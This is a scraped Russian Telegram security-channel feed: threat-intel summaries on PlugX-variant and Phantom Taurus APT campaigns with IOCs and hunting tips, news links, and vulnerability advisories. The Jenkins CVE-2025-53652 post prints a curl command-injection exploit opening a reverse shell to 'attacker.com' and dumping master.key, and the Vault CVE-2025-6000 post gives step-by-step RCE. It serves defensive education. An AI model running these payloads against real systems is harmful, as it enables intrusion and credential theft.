Fsecurity | HH

🧩

RainyDay ≈ Turian ≈ PlugX (variant): DLL Search Order Hijacking как общая основа

Cisco Talos описывает кампанию с 2022 года против telecom & manufacturing в Central/South Asia, приводящую к установке кастомного PlugX. Вариант пересекается с RainyDay и Turian: одинаковые законные приложения для DLL sideloading, единая крипто-цепочка XOR → RC4 → RtlDecompressBuffer (LZNT1) и частичный reuse RC4-ключей.

🌎

География и victims
Точные страны: Казахстан (телеком-оператор) и Узбекистан (ранее поражённые цели). В целом — Central & South Asia. Для BackdoorDiplomacy исторически: Africa, Europe, Middle East, Asia.

🎯

Attribution (medium confidence)
Наиболее вероятный актор — Naikon (PlugX-variant использует конфиг-формат RainyDay). Пересечения с BackdoorDiplomacy (Turian): схожие цели, однотипные лоадеры и крипто-примитивы → либо shared tooling/vendor, либо фактически один кластер.

🧪

Infection flow (общая логика)
Законный EXE → DLL search order hijacking (pc2msupp.dll) → чтение зашифрованного shellcode из соседнего файла → XOR → RC4 → LZNT1 → выполнение.
• RainyDay: s.exe → rdmin.src → self-inject.
• PlugX (variant): KMSEldi.exe → Mcsitesdvisor.afx → self-inject в контекст KMSEldi.exe.
• Turian: wingervlansec.exe → wingervlansec.dat → inject в wabmig.exe или explorer.exe → загрузка configer.dat (Config) и wingervlansec.ini (в т.ч. секция "AntiVir").

🔐

Code & crypto markers
Шеллкод-формат: XOR prelude → RC4 → LZNT1 (RtlDecompressBuffer).
RC4-ключи (reuse между семействами):
8f-2;g=3/c?1wf+c92rv.a — RainyDay / PlugX / Turian;
jfntv\1-m0vt801tyvqaf_)U89chasv` — RainyDay / PlugX;
отдельные ключи у части Turian по сэмплам.
ROL25 additive API hashing; местами Control-Flow Flattening.
PE-аномалия: у распакованных DLL намеренно искажён e_lfanew (невалидное смещение заголовка).
🧵 Dev-артефакты / PDB
Строки указывают на проекты dll-to-shellcode / shellcodeloader, присутствует icmpsh-master (提供网页版); встречались сборки, где MicrosoftEdgeUpdate.exe используется как альтернативный sideload-carrier.

🧿

PlugX (variant) — что важно
Кастомизированный BackDoor.PlugX.38: конфиг в стиле RainyDay, дополнительный XOR для строк; эскалация SeDebugPrivilege/SeTcbPrivilege (строки спрятаны модифицированным TEA); маскировка службы в services.exe; HTTPS для C2; библиотека VTCP 10.12.08; встроенный keylogger (логи активны 2022 → Dec 2024).

🔎

Артефакты и «крючки» для охоты
Carriers (allow-list → alert): KMSEldi.exe, wingervlansec.exe, s.exe (Mobile Popup Application, Quick Heal Technologies, signed).
Соседние файлы/паттерны: pc2msupp.dll + Mcsitesdvisor.afx / rdmin.src / wingervlansec.dat / configer.dat / wingervlansec.ini.
Process lineage: carrier.exe → (self) или → wabmig.exe/explorer.exe (child) + исходящий HTTPS.
Memory heuristics: короткий XOR-пролог → RC4 → RtlDecompressBuffer(LZNT1) вскоре после чтения локального файла; ROL25-хеширование API.
PE-аномалии: DLL с неадекватным e_lfanew после распаковки.
PDB/строки: dlltoshellcode, shellcodeloader_vs2008, icmpsh-master, MicrosoftEdgeUpdate.exe.

🛡

Hardening (quick wins)
Включить SafeDllSearchMode, настроить KnownDLLs, запретить side-by-side DLL в рабочих каталогах критичных приложений.
WDAC/AppLocker: deny для неожиданных DLL рядом с известными EXE; строгие allow-lists для апдейтеров/утилит.
EDR canaries: алерты на RtlDecompressBuffer + RC4-like циклы после чтения локального файла; отдельные правила на запуск KMSEldi.exe / wingervlansec.exe вне «зоны доверия».
Инвентаризация и мониторинг редко используемых «обновляющих» бинарников как потенциальных sideload-carriers.

TL;DR: один loader-скелет (XOR→RC4→LZNT1), общие carriers (KMSEldi.exe / wingervlansec.exe / s.exe), частичный reuse RC4-ключей и единые Dev-артефакты связывают RainyDay, Turian и PlugX(variant) в единую операцию; атрибуция к Naikon — medium confidence, с устойчивыми пересечениями с BackdoorDiplomacy.

🔗

https://blog.talosintelligence.com/how-rainyday-turian-and-a-new-plugx-variant-abuse-dll-search-order-hijacking/

🦔

THF

Please open Telegram to view this post

VIEW IN TELEGRAM

Please open Telegram to view this post

VIEW IN TELEGRAM

153 views16:43

Fsecurity | HH

SecurityLab.ru

Тысячи приложений под угрозой. F-Droid заявил, что новые правила Google могут убить независимые магазины

Корпорация требует личные данные, независимый каталог призывает писать депутатам.

🔗Ссылка:
https://www.securitylab.ru/news/564026.php

165 views18:46

Fsecurity | HH

www.opennet.ru

Отставка команды модераторов NixOS из-за разногласий с управляющим комитетом

Команда модераторов, отвечавшая за поддержание порядка в форумах и репозиториях проекта NixOS, объявила о снятии с себя полномочий в знак протеста против действий управляющего комитета (SC - Steering Committee), вмешивающегося в работу модераторов и пытающегося…

🔗Ссылка:
https://opennet.ru/63967/

138 views08:02

Fsecurity | HH

Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈

134 views09:13

Fsecurity | HH

Хабр

Узнаем из дампа памяти, какие документы открывал пользователь

При расследовании компьютерного инцидента первостепенное значение имеет анализ содержимого оперативной памяти и жесткого диска скомпрометированной машины. При этом содержимое памяти,...

🔗Ссылка:
https://habr.com/ru/companies/otus/articles/943222/

132 views11:50

Fsecurity | HH

Forwarded from purple shift

HashiCorp Vault — мощный opensource-инструмент, предназначенный для хранения, управления и защиты доступа к чувствительным данным: паролям, API-ключам, сертификатам. Он централизует работу с секретами, автоматизирует их выдачу и отзыв, а также обеспечивает тонкий контроль доступа в сложных распределённых инфраструктурах. Взаимодействие с Vault возможно через API, веб-интерфейс или CLI, а аутентификация поддерживает широкий спектр методов, включая интеграцию с Kubernetes и облачными платформами.

Однако... в августе этого года в HashiCorp Vault было обнаружено 9 уязвимостей, одна из которых (CVE-2025-6000) критическая (score 9.1). И это первая в истории публично задокументированная RCE-уязвимость в HashiCorp Vault, просуществовавшая 9 лет до исправления.

Уязвимость позволяет привилегированному оператору Vault создать подконтрольный файл аудита и зарегистрировать его как плагин, чтобы получить возможность выполнения произвольного кода.

Для эксплуатации нужно:

0. Иметь root токен. Его получение выходит за рамки данной статьи, однако стоит упомянуть, что связка нескольких CVE даёт возможность это сделать: CVE-2025-6037 позволяет имперсонироваться через уязвимость проверки сертификатов, CVE-2025-5999 позволяет повысить привилегии до root.

Условие является необходимым, так как для создания аудита и регистрации плагина обычно нужны привилегии root.

1. Определить директорию с плагинами. При попытке загрузить несуществующий файл эндпоинт возвращает сообщение об ошибке, которое содержит полный путь к директории. Достаточно отправить

POST /v1/sys/plugins/catalog/non_existing_name

и в ответ получить

1 error occurred:\n\t* failed to verify plugin plugin \"non_existing_name\" version \"v1.0.0\": extracted artifact directory not found: /home/vault/vault_plugins/non_existing_name_1.0.0_linux_amd64\n\n

Полный путь до директории плагинов нужен для записи файла аудита в эту директорию. А запись именно в этот каталог необходима для последующей загрузки файла в качестве плагина. Плагины могут быть загружены только из этой директории.

2. Записать файл аудита в каталог плагинов. Для этого зарегистрировать аудит с такими параметрами:

file_path (путь к файлу аудита) = "/home/vault/vault_plugins/script.sh"

Указывается директория с плагинами из предыдущего шага.

mode (права на файл аудита) = "0755"

Файл аудита должен быть исполняемым (rwxr-xr-x)

prefix (префикс будет добавлен перед каждым логом) = "#!/bin/bash\n(some bash payload)"

Эта часть содержит наш пейлоад. Содержимое префикса будет выполняться при загрузке плагина.

3. Зарегистрировать плагин. Для регистрации плагина необходимо указать его sha256, однако тут есть загвоздка: лог аудита содержит различные временные метки, а также хэшированные данные, предсказать которые практически невозможно. Поэтому для получения точной копии лога аудита, можно предварительно зарегистрировать еще один аудит, транслирующий логи на подконтрольный нам сокет. В этом случае добавляется шаг по удалению аудита с префиксом перед подсчетом sha256.

После регистрации исполняемого файла в качестве плагина, он выполняется от имени пользователя vault.

Как обнаружить эксплуатацию CVE-2025-6000:

1. Корреляция событий из шагов выше явно укажет на попытку эксплуатации:

- Попытка регистрации несуществующего плагина;
- Cоздание аудита с указанием prefix и mode;
- Удаление недавно созданного аудита (также рекомендуем мониторить удаление аудита в принципе, так как это событие само по себе должно вызывать подозрения);
- Регистрация подозрительного плагина.

2. Отслеживайте аномалии в цепочках процессов от vault. Например, запуск скриптов.

Методы защиты:

Уязвимость CVE-2025-6000 исправлена в Vault Community Edition 1.20.1 и Vault Enterprise 1.20.1, 1.19.7, 1.18.12 и 1.16.23.

Поэтому стоит обновиться до этих версий. В исправленных версиях аудит с префиксом требует явного указания в конфигурации vault, а также аудит не может использовать файлы с правами на выполнение (0777, 0755 и т.д.) и не может быть записан в директорию плагинов.

134 views15:51

Fsecurity | HH

Ryuku | Web Security Research & Bug Bounty

Hunting postMessage Vulnerabilities – Part 1

Introduction Modern web applications rely heavily on external resources and integrations. Without cross-origin communication, many of the features we take for granted would not be possible.
However, this flexibility comes with risks. In this blog post, I’ll…

🔗Ссылка:
https://blog.ryukudz.com/posts/postmessage-part-1/

142 views18:29

Fsecurity | HH

🔗Ссылка:
https://blog.ryukudz.com/posts/postmessage-part-2/

142 views08:00

Fsecurity | HH

Forwarded from Похек

CVE-2025-53652: Jenkins под ударом через Git Parameter
#jenkins #devops #dev #git

Command injection в популярном Jenkins Git Parameter Plugin ставит под угрозу DevOps инфраструктуру тысяч организаций. Несмотря на официальную оценку "Medium", исследователи VulnCheck доказали возможность удаленного выполнения кода и компрометации CI/CD пайплайнов.

🪲

Суть уязвимости

Git Parameter Plugin не валидирует параметры, передаваемые в build-процессы. Плагин принимает произвольные значения вместо проверки соответствия предложенным вариантам, что позволяет инъекцию команд через Git-параметры.

Затронутые версии: 439.vb_0e46ca_14534 и ранее
Исправлено в: 444.vca_b_84d3703c2

#️⃣

Техническая механика атаки

➡️

Цепочка эксплуатации

# Нормальный параметр
BRANCH_PARAM = "master"
# Выполняется: git rev-parse --resolve-git-dir /path/master/.git

# Вредоносный параметр
BRANCH_PARAM = "$(sleep 80)"  
# Выполняется: git rev-parse --resolve-git-dir /path/$(sleep 80)/.git
# Результат: команда sleep выполняется как дочерний процесс

Плагин встраивает пользовательский ввод напрямую в shell-команды без валидации. Git как GTFObin предоставляет множество способов выполнения команд, делая cmd injection особенно опасной.

➡️

Практический эксплойт

# Reverse shell через curl
curl -kv 'http://jenkins:8080/job/buildName/build' -X POST \
  -H 'Cookie: [cookie]' \
  --data-urlencode 'Jenkins-Crumb=[crumb]' \
  --data-urlencode 'json={"parameter":{"name":"BRANCH_PARAM","value":"$(bash -c \"bash &> /dev/tcp/attacker.com/12700 <&1\")"}}'

❗️

Масштаб проблемы

VulnCheck провел анализ интернет-экспозиции Jenkins:

| Категория              | Количество серверов | Риск|
|------------------------|---------------------|-------------|
| Требуют аутентификации | 100,000+            | Средний     |
| Открытая регистрация   | ~1,000              | Высокий     |
| Без аутентификации     | ~15,000             | Критический |

15,000 Jenkins-серверов полностью доступны без аутентификации, что делает RCE возможным "из коробки".

ℹ️

Требования для эксплуатации

➡️Аутентифицированные атаки
- Права Item/Build на целевом проекте
- Знание имени build-задачи
- Валидная сессия и CSRF-токен

➡️Неаутентифицированные атаки
Даже на серверах без аутентификации требуется:
- Валидный session cookie
- Jenkins-Crumb (CSRF токен)
- Имя build-задачи

# Получение необходимых данных
curl -kv http://target:8080/ -o /dev/null  # Получить cookie
curl -kv http://target:8080/job/buildName/build -H 'Cookie: [cookie]' | grep "data-crumb-value="

❗️

Реальное воздействие

➡️В случае успешного похека

# Результат эксплуатации
$ nc -lvnp 1270
Connection received on 172.18.0.3 55664
$ id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)

$ cat ~/secrets/master.key
05322ff531f1b52117bf013b2fe77b40dacbc56268d68b9e234216fe825a0073a5c8051181033f630e67c408d58c3ef631e18ba8b8e6722e64d3c1380518e89a91b4256c5c348febceb24ef32f144045ed422dfb4bdc840aca33814989e431aa00db6df7c403da38247324783811d46c6f3caa1f9b1b26d979fff4391249ca8a

➡️

Потенциальные последствия
- Доступ к master.key — полная компрометация Jenkins
- Исходный код проектов — утечка интеллектуальной собственности
- Секреты CI/CD — credentials, API ключи, сертификаты
- Supply chain атаки — внедрение backdoor в артефакты
- Lateral movement — распространение по инфраструктуре

❗️

Митигация и защита

➡️Немедленные действия
1. Обновление плагина до версии 444.vca_b_84d3703c2+
2. Проверка bypass-флага — убедиться, что не установлен:

   -Dnet.uaznia.lukanus.hudson.plugins.gitparameter.GitParameterDefinition.allowAnyParameterValue=true

3. Аудит конфигурации — отключить ненужные плагины

➡️

Долгосрочная стратегия
- Принцип наименьших привилегий для build permissions
- Сетевая сегментация Jenkins от критических систем
- Мониторинг активности через SIEM/SOC
- Регулярные security assessments CI/CD инфраструктуры

Источники:

🔗

VulnCheck Analysis

🔗

Jenkins Security Advisory

🔗

CVE-2025-53652 NVD

🌚

@poxek | MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч

Please open Telegram to view this post

VIEW IN TELEGRAM

136 views10:31

Fsecurity | HH

Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈

126 views10:54

Fsecurity | HH

Хабр

Bug hunting, как новая этика ИБ: философия открытых дверей

В информационной безопасности есть множество инструментов контроля качества: внутренние тесты, внешние аудиты, пентесты. Но у всех этих методов есть общее ограничение — они...

🔗Ссылка:
https://habr.com/ru/companies/securitm/articles/951040/

132 views12:28

Fsecurity | HH

SecurityLab.ru

Качай, не бойся, но ты уже взломан. В 70% случаев российские компании «попадались» из-за загрузки зараженного файла

Анализ F6: что на самом деле угрожает российскому бизнесу в киберпространстве.

🔗Ссылка:
https://www.securitylab.ru/news/564092.php?r=1

142 views14:43

Fsecurity | HH

Forwarded from Threat Hunting Father 🦔

👽 Phantom Taurus — NET-STAR: новый «китайский» APT и .NET-IIS бэкдоры

Unit 42 обнаружили новый китайский nexus-APT, обозначенный Phantom Taurus.

🎯 Группа целится в МИДы / посольства, телекомы и госструктуры в регионе Middle East / Africa / Asia и примечательна уникальным набором TTP и собственным .NET-IIS набором — NET-STAR (IIServerCore + AssemblyExecuter v1/v2).

🫆Быстрая картина атак (high-level flow)
• Первичное проникновение — web-shell / уязвимый IIS endpoint (часто OutlookEN.aspx как загрузчик).

• Загрузка в память IIServerCore (fileless) → поддержка динамической загрузки .NET-ассемблей (AssemblyExecuter).

• Пост-эксплуатация — поиск нужной информации: сначала email-theft, в 2025 — сдвиг в сторону целевых SQL-дампов через mssq.bat и WMI-исполнение.

• Экфильтрация — зашифрованные C2 (AES), память-только payloads, timestomp / изменение дат для сокрытия следов.

🛠️ Основной тулкит (подборка)
• NET-STAR suite: IIServerCore, AssemblyExecuter v1, AssemblyExecuter v2 (v2 — AMSI & ETW bypass).

• Вспомогательные/известные инструменты в наборе TTP: China Chopper, JuicyPotato/SharpEfsPotato, Impacket, Mimikatz, TunnelSpecter, SweetSpecter и др. (см. Appendix A в отчёте).

Что делает NET-STAR (технически)
• IIServerCore — модульный fileless backdoor: загружается через ASPX web-shell (OutlookEN.aspx), держится в w3wp.exe, принимает команды, загружает .NET-assemblies из Base64, выполняет в памяти, шифрует ответ AES, поддерживает timestomp/changeLastModified.

• AssemblyExecuter v1 — in-memory загрузка и исполнение .NET-assemblies (минимальная «шумность» для AV).
AssemblyExecuter v2 — как v1 + методы обхода AMSI/ETW; применение обходов динамически по параметрам.

🐱

Detection & Hunting
• Наличие ASPX-файлов с встроенным Base64-блоком (особенно OutlookEN.aspx или похожие имена).
• w3wp.exe с нетипичной динамической загрузкой .NET-ассемблей (Assembly.Load / Reflection / Invoke), особенно если командный поток содержит STAR-delimited Base64.
• Необычные модификации timestamps (файлы с будущими датами, timestomp).
• Команды на исполнение SQL через WMI (запуски mssq.bat, sqlcmd под контекстом удалённого выполнения).

Hunting tips:
• Фокус — memory only поведения: инструменты типа Sysmon + ETW/Process-Create/ModuleLoad + EDR memory-callbacks помогут увидеть Assembly.Load и динамическое Reflection.
• Коррелируйте ASPX-загрузки с сетевыми запросами к ненормальным C2 и с последующими WMI-вызовами (вспышка wmic process call create / win32_process выполняющие mssq.bat).

Проактивно просканируйте webroot на ASPX с Base64 и сравните SHA/текстовые отпечатки с known-IOCs.

IOCs (средне/высокая степень уверенности)
SHA256:
1. IIServerCore (ServerCore.dll): eeed5530fa1cdeb69398dc058aaa01160eab15d4dcdcd6cb841240987db284dc.
2. AssemblyExecuter V1 (ExecuteAssembly.dll): 3e55bf8ecaeec65871e6fca4cb2d4ff2586f83a20c12977858348492d2d0dec4.
3. AssemblyExecuter V2 (ExecuteAssembly.dll): afcb6289a4ef48bf23bab16c0266f765fab8353d5e1b673bd6e39b315f83676e and b76e243cf1886bd0e2357cbc7e1d2812c2c0ecc5068e61d681e0d5cff5b8e038.
(Добавьте эти SHA в EDR/AV/IOC-feeds; ищите совпадения в внутренней телеметрии.)

Быстрая тактика реагирования (playbook bullets)
• Изолируйте и снимите дамп w3wp.exe при подозрении на in-memory .NET-загрузку.
Соберите веб-корень (ASPX) и сделайте хеши/стринг-анализ (ищем Base64, STAR-delimiter).
• Проверьте WMI-журналы на remote WMI execution и поиск mssq.bat/sql-вызовов.
• Проанализируйте сетевой трафик на AES-зашифрованные POST/GET с нестандартными параметрами и STAR-делимитером.
• Удалите/ресторите компрометированные web-файлы, обновите веб-серверы, примените правила Web Application Firewall для блокировки подозрительных ASPX загрузок.

🔗

https://unit42.paloaltonetworks.com/phantom-taurus/

🦔

THF

Please open Telegram to view this post

VIEW IN TELEGRAM

Please open Telegram to view this post

VIEW IN TELEGRAM

178 views17:44

Fsecurity | HH

Хабр

В сети появился китайский ИИ-инструмент для пентестинга